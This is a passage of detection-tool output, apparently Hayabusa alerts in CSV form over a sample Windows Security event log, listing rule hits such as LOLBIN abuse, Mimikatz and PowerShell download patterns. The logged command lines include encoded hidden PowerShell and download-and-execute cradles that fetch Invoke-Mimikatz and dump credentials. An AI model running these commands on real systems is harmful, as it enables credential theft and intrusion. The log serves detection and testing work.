ZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.135 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.135 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.135 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.135 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.135 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.348 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.348 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.348 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.348 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.348 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.348 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:32:11.794 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:32:11.932 
+00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:32:12.031 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:32:15.491 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb54 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 22:02:47.665 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 22:03:41.021 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7a4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 22:04:04.853 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 22:05:07.184 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x638 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 22:05:22.839 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 22:38:23.648 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:11:13.677 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:13:17.369 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:28.626 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:32.207 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:32.340 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:38.772 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:41.273 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-09-19 23:21:41.456 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:41.478 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:52.074 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:52.074 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ri1rh0d1.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb9c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:29:34.138 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:29:34.389 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: 
C:\Windows\System32\dllhost.exe | PID: 0x31c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:29:34.400 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:29:35.564 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:29:35.564 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\nkjhcxgj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xfa0 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:36:49.583 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:36:49.699 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfec | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:36:49.715 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:36:50.791 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:36:50.791 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gajrh2ob.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xcbc | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:00:02.041 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x430 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:03:44.685 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute 
Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4b8 | User: IEUser | LID: 0x6593d",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in 
CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:45.826 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:45.870 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x62c | User: IEUser | LID: 
0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:19.540 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute 
Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:19.540 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a4 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:19.540 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:19.540 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:19.540 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:19.540 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:19.540 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:19.540 +00:00,IE10Win7,4688,medium,,PowerShell Web 
Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb80 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,high,,Suspicious Program 